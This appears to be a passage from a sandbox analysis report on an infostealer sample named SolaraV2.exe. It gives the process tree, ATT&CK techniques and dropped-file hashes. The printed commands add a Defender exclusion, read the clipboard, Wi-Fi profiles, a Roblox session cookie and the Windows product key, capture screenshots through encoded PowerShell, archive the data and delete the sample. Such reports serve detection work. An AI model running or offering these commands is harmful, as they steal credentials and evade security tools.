      attrib +h +s "C:\Users\Admin\AppData\Local\Temp\SolaraV2.exe"
      4⤵
      Views/modifies file attributes
      PID:2428
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\   .scr'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2920
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\   .scr'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:3560
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2196
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:3228
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:32
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:1184
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
    3⤵
    PID:1856
  - - C:\Windows\System32\Wbem\WMIC.exe
      WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
      4⤵
      PID:1544
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
    3⤵
    - Clipboard Data
    PID:3244
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      Clipboard Data
      Suspicious behavior: EnumeratesProcesses
      PID:1628
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    PID:3748
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:4568
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:4412
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:3108
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
    3⤵
    - System Network Configuration Discovery: Wi-Fi Discovery
    PID:4512
  - - C:\Windows\system32\netsh.exe
      netsh wlan show profile
      4⤵
      Event Triggered Execution: Netsh Helper DLL
      System Network Configuration Discovery: Wi-Fi Discovery
      PID:5072
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "systeminfo"
    3⤵
    PID:1828
  - - C:\Windows\system32\systeminfo.exe
      systeminfo
      4⤵
      Gathers system information
      PID:2256
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
    3⤵
    PID:3596
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:4204
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ml55q5tg\ml55q5tg.cmdline"
        5⤵
        
        PID:3964
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESB0C2.tmp" "c:\Users\Admin\AppData\Local\Temp\ml55q5tg\CSC68ACCDE913F42D298DFAC53EB6E115E.TMP"
        6⤵
        
        PID:1076
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
    3⤵
    PID:2532
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
      4⤵
      PID:3024
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
    3⤵
    PID:344
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:1224
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
    3⤵
    PID:4708
  - - C:\Windows\system32\attrib.exe
      attrib -r C:\Windows\System32\drivers\etc\hosts
      4⤵
      Drops file in Drivers directory
      Views/modifies file attributes
      PID:3276
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:3204
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:4448
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:1108
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:688
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
    3⤵
    PID:132
  - - C:\Windows\system32\attrib.exe
      attrib +r C:\Windows\System32\drivers\etc\hosts
      4⤵
      Drops file in Drivers directory
      Views/modifies file attributes
      PID:3952
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:3200
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:3172
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    PID:2404
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:2816
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:1088
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:4748
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:2840
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:2952
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
    3⤵
    PID:4584
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:3596
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "getmac"
    3⤵
    PID:7120
  - - C:\Windows\system32\getmac.exe
      getmac
      4⤵
      PID:3080
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI21682\rar.exe a -r -hp"7245" "C:\Users\Admin\AppData\Local\Temp\rk2ry.zip" *"
    3⤵
    PID:3264
  - - C:\Users\Admin\AppData\Local\Temp\_MEI21682\rar.exe
      C:\Users\Admin\AppData\Local\Temp\_MEI21682\rar.exe a -r -hp"7245" "C:\Users\Admin\AppData\Local\Temp\rk2ry.zip" *
      4⤵
      Executes dropped EXE
      PID:3368
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic os get Caption"
    3⤵
    PID:800
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic os get Caption
      4⤵
      PID:2936
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
    3⤵
    PID:4604
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic computersystem get totalphysicalmemory
      4⤵
      PID:1792
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
    3⤵
    PID:2144
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic csproduct get uuid
      4⤵
      PID:4456
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
    3⤵
    PID:4924
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:1988
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    PID:3904
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:3172
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      PID:4944
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
    3⤵
    PID:4624
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:4516
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "ping localhost -n 3 > NUL && del /A H /F "C:\Users\Admin\AppData\Local\Temp\SolaraV2.exe""
    3⤵
    - System Network Configuration Discovery: Internet Connection Discovery
    PID:5328
  - - C:\Windows\system32\PING.EXE
      ping localhost -n 3
      4⤵
      System Network Configuration Discovery: Internet Connection Discovery
      Runs ping.exe
      PID:5496

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Privilege Escalation

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Obfuscated Files or Information

T1027

Command Obfuscation

T1027.010

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Process Discovery

T1057

Remote System Discovery

T1018

System Information Discovery

T1082

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Wi-Fi Discovery

T1016.002

Lateral Movement

Collection

Clipboard Data

T1115

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\1WcINQcaTp.tmp

Filesize
160KB

MD5
f310cf1ff562ae14449e0167a3e1fe46

SHA1
85c58afa9049467031c6c2b17f5c12ca73bb2788

SHA256
e187946249cd390a3c1cf5d4e3b0d8f554f9acdc416bf4e7111fff217bb08855

SHA512
1196371de08c964268c44103ccaed530bda6a145df98e0f480d8ee5ad58cb6fb33ca4c9195a52181fe864726dcf52e6a7a466d693af0cda43400a3a7ef125fad

Download Submit
C:\Users\Admin\AppData\Local\Temp\Co0bq6cG8Y.tmp

Filesize
20KB

MD5
653d85963d9bed0d2fa2a896e169b56b

SHA1
097128b8278410cb1e4c17344afcc320f357ec75

SHA256
35b07afe2637c0d2c5858f5f7b86834fa2330e86152284638bd41b1068e433e0

SHA512
1cf8d4b837bc9c28ac9addc1c1f46a064343f0a9f6dde89ae4d8a32fe9686e21a9d45ab833c537cf231e273a0134d6a5a7eb84a66fea41503b10a6c7c9b6d205

Download Submit
C:\Users\Admin\AppData\Local\Temp\OupulVdWIt.tmp

Filesize
40KB

MD5
a182561a527f929489bf4b8f74f65cd7

SHA1
8cd6866594759711ea1836e86a5b7ca64ee8911f

SHA256
42aad7886965428a941508b776a666a4450eb658cb90e80fae1e7457fc71f914

SHA512
9bc3bf5a82f6f057e873adebd5b7a4c64adef966537ab9c565fe7c4bb3582e2e485ff993d5ab8a6002363231958fabd0933b48811371b8c155eaa74592b66558

Download Submit
C:\Users\Admin\AppData\Local\Temp\VlvXFxpESz.tmp

Filesize
114KB

MD5
9151f5327b2e0c5bbf2c2250b4ae413b

SHA1
9507d4adbbc09867323d6ccee16cb78477fdcbb7

SHA256
c9fa862d114e3c66b223992ad59303305df5a7c58d93b7b64baab504ba116980

SHA512
ccff4302b07e3573738d6bcb5128910a737e7352b303265b79ccd5bd43070bfc51be2734da1da5b48a06aed563559097edfec2fd0661339662c3bf058e18289c

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI21682\VCRUNTIME140.dll

Filesize
117KB

MD5
862f820c3251e4ca6fc0ac00e4092239

SHA1
ef96d84b253041b090c243594f90938e9a487a9a

SHA256
36585912e5eaf83ba9fea0631534f690ccdc2d7ba91537166fe53e56c221e153

SHA512
2f8a0f11bccc3a8cb99637deeda0158240df0885a230f38bb7f21257c659f05646c6b61e993f87e0877f6ba06b347ddd1fc45d5c44bc4e309ef75ed882b82e4e

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI21682\_bz2.pyd

Filesize
48KB

MD5
58fc4c56f7f400de210e98ccb8fdc4b2

SHA1
12cb7ec39f3af0947000295f4b50cbd6e7436554

SHA256
dfc195ebb59dc5e365efd3853d72897b8838497e15c0977b6edb1eb347f13150

SHA512
ad0c6a9a5ca719d244117984a06cce8e59ed122855e4595df242df18509752429389c3a44a8ba0abc817d61e37f64638ccbdffc17238d4c38d2364f0a10e6bc7

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI21682\_ctypes.pyd

Filesize
62KB

MD5
79879c679a12fac03f472463bb8ceff7

SHA1
b530763123bd2c537313e5e41477b0adc0df3099

SHA256
8d1a21192112e13913cb77708c105034c5f251d64517017975af8e0c4999eba3

SHA512
ca19ddaefc9ab7c868dd82008a79ea457acd71722fec21c2371d51dcfdb99738e79eff9b1913a306dbedacb0540ca84a2ec31dc2267c7b559b6a98b390c5f3a7

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI21682\_decimal.pyd

Filesize
117KB

MD5
21d27c95493c701dff0206ff5f03941d

SHA1
f1f124d4b0e3092d28ba4ea4fe8cf601d5bd8600

SHA256
38ec7a3c2f368ffeb94524d7c66250c0d2dafe58121e93e54b17c114058ea877

SHA512
a5fbda904024cd097a86d6926e0d593b0f7e69e32df347a49677818c2f4cd7dc83e2bab7c2507428328248bd2f54b00f7b2a077c8a0aad2224071f8221cb9457

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI21682\_hashlib.pyd

Filesize
35KB

MD5
d6f123c4453230743adcc06211236bc0

SHA1
9f9ade18ac3e12bcc09757a3c4b5ee74cf5e794e

SHA256
7a904fa6618157c34e24aaac33fdf84035215d82c08eec6983c165a49d785dc9

SHA512
f5575d18a51207b4e9df5bb95277d4d03e3bb950c0e7b6c3dd2288645e26e1de8edcf634311c21a6bdc8c3378a71b531f840b8262db708726d36d15cb6d02441

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI21682\_lzma.pyd

Filesize
86KB

MD5
055eb9d91c42bb228a72bf5b7b77c0c8

SHA1
5659b4a819455cf024755a493db0952e1979a9cf

SHA256
de342275a648207bef9b9662c9829af222b160975ad8925cc5612cd0f182414e

SHA512
c5cba050f4b805a299f5d04ec0dce9b718a16bc335cac17f23e96519da0b9eaaf25ae0e9b29ef3dc56603bfe8317cdc1a67ee6464d84a562cf04bea52c31cfac

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI21682\_queue.pyd

Filesize
26KB

MD5
513dce65c09b3abc516687f99a6971d8

